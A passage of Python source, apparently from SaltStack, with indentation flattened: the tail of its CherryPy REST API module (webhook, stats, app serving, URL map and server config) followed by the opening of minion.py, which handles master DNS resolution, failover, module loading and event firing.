- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
"""
tag = "/".join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, "raw_body", "")
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event(
{"body": raw_body, "post": data, "headers": headers}, tag
)
return {"success": ret}
class Stats(object):
"""
Expose statistics on the running CherryPy server
"""
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def __init__(self):
if cherrypy.config["apiopts"].get("stats_disable_auth"):
self._cp_config["tools.salt_auth.on"] = False
def GET(self):
"""
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
"""
if hasattr(logging, "statistics"):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
"""
Class to serve HTML5 apps
"""
exposed = True
def GET(self, *args):
"""
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
"""
apiopts = cherrypy.config["apiopts"]
default_index = os.path.abspath(
os.path.join(os.path.dirname(__file__), "index.html")
)
return cherrypy.lib.static.serve_file(apiopts.get("app", default_index))
class API(object):
"""
Collect configuration and URL map for building the CherryPy app
"""
url_map = {
"index": LowDataAdapter,
"login": Login,
"logout": Logout,
"token": Token,
"minions": Minions,
"run": Run,
"jobs": Jobs,
"keys": Keys,
"events": Events,
"stats": Stats,
}
def _setattr_url_map(self):
"""
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
"""
if self.apiopts.get("enable_sessions", True) is False:
url_blacklist = ["login", "logout", "minions", "jobs"]
else:
url_blacklist = []
urls = (
(url, cls) for url, cls in self.url_map.items() if url not in url_blacklist
)
for url, cls in urls:
setattr(self, url, cls())
def _update_url_map(self):
"""
Assemble any dynamic or configurable URLs
"""
if HAS_WEBSOCKETS:
self.url_map.update({"ws": WebsocketEndpoint})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update(
{self.apiopts.get("webhook_url", "hook").lstrip("/"): Webhook}
)
# Enable the single-page JS app URL.
self.url_map.update({self.apiopts.get("app_path", "app").lstrip("/"): App})
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.apiopts = cherrypy.config["apiopts"]
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
"""
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
"""
conf = {
"global": {
"server.socket_host": self.apiopts.get("host", "0.0.0.0"),
"server.socket_port": self.apiopts.get("port", 8000),
"server.thread_pool": self.apiopts.get("thread_pool", 100),
"server.socket_queue_size": self.apiopts.get("queue_size", 30),
"max_request_body_size": self.apiopts.get(
"max_request_body_size", 1048576
),
"debug": self.apiopts.get("debug", False),
"log.access_file": self.apiopts.get("log_access_file", ""),
"log.error_file": self.apiopts.get("log_error_file", ""),
},
"/": {
"request.dispatch": cherrypy.dispatch.MethodDispatcher(),
"tools.trailing_slash.on": True,
"tools.gzip.on": True,
"tools.html_override.on": True,
"tools.cors_tool.on": True,
},
}
if salt.utils.versions.version_cmp(cherrypy.__version__, "12.0.0") < 0:
# CherryPy >= 12.0 no longer supports "timeout_monitor", only set
# this config option when using an older version of CherryPy.
# See Issue #44601 for more information.
conf["global"]["engine.timeout_monitor.on"] = self.apiopts.get(
"expire_responses", True
)
if cpstats and self.apiopts.get("collect_stats", False):
conf["/"]["tools.cpstats.on"] = True
if "favicon" in self.apiopts:
conf["/favicon.ico"] = {
"tools.staticfile.on": True,
"tools.staticfile.filename": self.apiopts["favicon"],
}
if self.apiopts.get("debug", False) is False:
conf["global"]["environment"] = "production"
# Serve static media if the directory has been set in the configuration
if "static" in self.apiopts:
conf[self.apiopts.get("static_path", "/static")] = {
"tools.staticdir.on": True,
"tools.staticdir.dir": self.apiopts["static"],
}
# Add to global config
cherrypy.config.update(conf["global"])
return conf
def get_app(opts):
"""
Returns a WSGI app and a configuration dictionary
"""
apiopts = opts.get(__name__.rsplit(".", 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config["saltopts"] = opts
cherrypy.config["apiopts"] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function
import os
import re
import sys
import copy
import time
import types
import signal
import fnmatch
import logging
import threading
import traceback
import multiprocessing
from random import randint, shuffle
from salt.config import DEFAULT_MINION_OPTS
from stat import S_IMODE
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
if six.PY3:
import ipaddress
else:
import salt.ext.ipaddress as ipaddress
from salt.ext.six.moves import range
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
try:
import zmq
# TODO: cleanup
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
HAS_ZMQ = True
except ImportError:
# Running in local, zmq not needed
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minions
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltException,
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
ret['master_ip'] = '127.0.0.1'
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. Set \'syndic_master\' value in minion config.'.format(master)
else:
err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolveable address. Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def prep_ip_port(opts):
ret = {}
if opts['master_uri_format'] == 'ip_only':
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(":", 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: ::1:1234
ret['master'] = ip_port[0]
ret['master_port'] = ip_port[1]
return ret
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedir would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def parse_args_and_kwargs(func, args, data=None):
'''
Wrap load_args_and_kwargs
'''
salt.utils.warn_until(
'Boron',
'salt.minion.parse_args_and_kwargs() has been renamed to '
'salt.minion.load_args_and_kwargs(). Please change this function call '
'before the Boron release of Salt.'
)
return load_args_and_kwargs(func, args, data=data)
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, six.string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_cli
# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Boron',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
if hasattr(minion, 'schedule'):
minion.schedule.eval()
else:
log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
return
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons')
if b_conf:
return self.beacons.process(b_conf)
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# check if master_type was altered from its default
if opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
# split module and function and try loading the module
mod, fun = opts['master'].split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise TypeError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod + '.' + fun]()
except TypeError:
msg = ('Failed to evaluate master address from '
'module \'{0}\''.format(opts['master']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(master_mod))
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
shuffle(opts['master'])
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], str) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
log.info('Removing possibly failed master {0} from list of'
' masters'.format(opts['master']))
# create new list of master with the possibly failed one removed
opts['master'] = [x for x in opts['master_list'] if opts['master'] != x]
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# If failover is set, minion have to failover on DNS errors instead of retry DNS resolve.
# See issue 21082 for details
if opts['retry_dns']:
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
local_masters = copy.copy(opts['master'])
for master in local_masters:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
self.opts = opts
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = local_masters
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError:
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
self.connected = False
msg = ('No master could be reached or all masters denied '
'the minions connection attempt.')
log.error(msg)
else:
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
self.eval_master(self.opts, failed=True)
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils,
include_errors=True)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts, self.functions, self.utils)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None):
self.opts = salt.config.minion_config(opts['conf_file'])
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
# timeout for one of the minions to auth with a master
MINION_CONNECT_TIMEOUT = 5
def __init__(self, opts):
super(MultiMinion, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
if not isinstance(self.opts['master'], list):
log.error(
'Attempting to start a multimaster system with one master')
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# Check that for tcp ipc_mode that we have either default ports or
# lists of ports
if self.opts.get('ipc_mode') == 'tcp' and (
(not isinstance(self.opts['tcp_pub_port'], list) and
self.opts['tcp_pub_port'] != 4510) or
(not isinstance(self.opts['tcp_pull_port'], list) and
self.opts['tcp_pull_port'] != 4511)
):
raise SaltException('For multi-master, tcp_(pub/pull)_port '
'settings must be lists of ports, or the '
'default 4510 and 4511')
masternumber = 0
for master in set(self.opts['master']):
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
s_opts['auth_timeout'] = self.MINION_CONNECT_TIMEOUT
if self.opts.get('ipc_mode') == 'tcp':
# If one is a list, we can assume both are, because of check above
if isinstance(self.opts['tcp_pub_port'], list):
s_opts['tcp_pub_port'] = self.opts['tcp_pub_port'][masternumber]
s_opts['tcp_pull_port'] = self.opts['tcp_pull_port'][masternumber]
else:
s_opts['tcp_pub_port'] = self.opts['tcp_pub_port'] + (masternumber * 2)
s_opts['tcp_pull_port'] = self.opts['tcp_pull_port'] + (masternumber * 2)
self.io_loop.spawn_callback(self._connect_minion, s_opts)
masternumber += 1
@tornado.gen.coroutine
def _connect_minion(self, opts):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
try:
minion = Minion(opts,
self.MINION_CONNECT_TIMEOUT,
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(opts['master']),
)
yield minion.connect_master()
minion.tune_in(start=False)
break
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
# Fire off all the minion coroutines
self.minions = self._spawn_minions()
# serve forever!
self.io_loop.start()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
self.io_loop = io_loop or zmq.eventloop.ioloop.ZMQIOLoop()
if not self.io_loop.initialized():
self.io_loop.install()
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')]
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup the of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains. We do this for proxies in the
# post_master_init
if not salt.utils.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
# TODO: remove?
def sync_connect_master(self):
'''
Block until we are connected to a master
'''
self._connect_master_future = self.connect_master()
# finish connecting to master
self._connect_master_future.add_done_callback(lambda f: self.io_loop.stop())
try:
self.io_loop.start()
except KeyboardInterrupt:
self.destroy()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
future_exception = self._connect_master_future.exc_info()
if future_exception:
# This needs to be re-raised to preserve restart_on_error behavior.
raise six.reraise(*future_exception)
@tornado.gen.coroutine
def connect_master(self):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.functions, self.returners, self.function_errors = self._load_modules()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if 'mine.update' in self.functions:
log.info('Added mine.update to scheduler')
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2
}
}, persist=True)
# add master_alive job if enabled
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
self.grains_cache = self.opts['grains']
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
msg = 'Minion return retry timer set to {0} seconds'
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug(msg.format(random_retry) + ' (randomized)')
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
'Invalid value (return_retry_timer: {0} or return_retry_timer_max: {1})'
'both must be a positive integers'.format(
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
)
log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg.format(self.opts.get('return_retry_timer')))
return self.opts.get('return_retry_timer')
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _process_beacons(self):
'''
Process each beacon and send events if appropriate
'''
# Process Beacons
try:
beacons = self.process_beacons(self.functions)
except Exception as exc:
log.critical('Beacon processing failed: {0}. No beacons will be processed.'.format(traceback.format_exc(exc)))
beacons = None
if beacons:
self._fire_master(events=beacons)
for beacon in beacons:
serialized_data = salt.utils.dicttrim.trim_dict(
self.serial.dumps(beacon['data']),
self.opts.get('max_event_size', 1048576),
is_msgpacked=True,
)
log.debug('Sending event - data = {0}'.format(beacon['data']))
event = '{0}{1}{2}'.format(
beacon['tag'],
salt.utils.event.TAGEND,
serialized_data,
)
self.event_publisher.handle_publish([event])
def _load_modules(self, force_refresh=False, notify=False, proxy=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh)
self.utils = salt.loader.utils(self.opts)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
return functions, returners, errors
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
channel = salt.transport.Channel.factory(self.opts)
try:
result = channel.send(load, timeout=timeout)
return True
except salt.exceptions.SaltReqTimeoutError:
log.info('fire_master failed: master could not be contacted. Request timed out.')
except Exception:
log.info('fire_master failed: {0}'.format(traceback.format_exc()))
return False
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
target = Minion._thread_multi_return
else:
target = Minion._thread_return
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
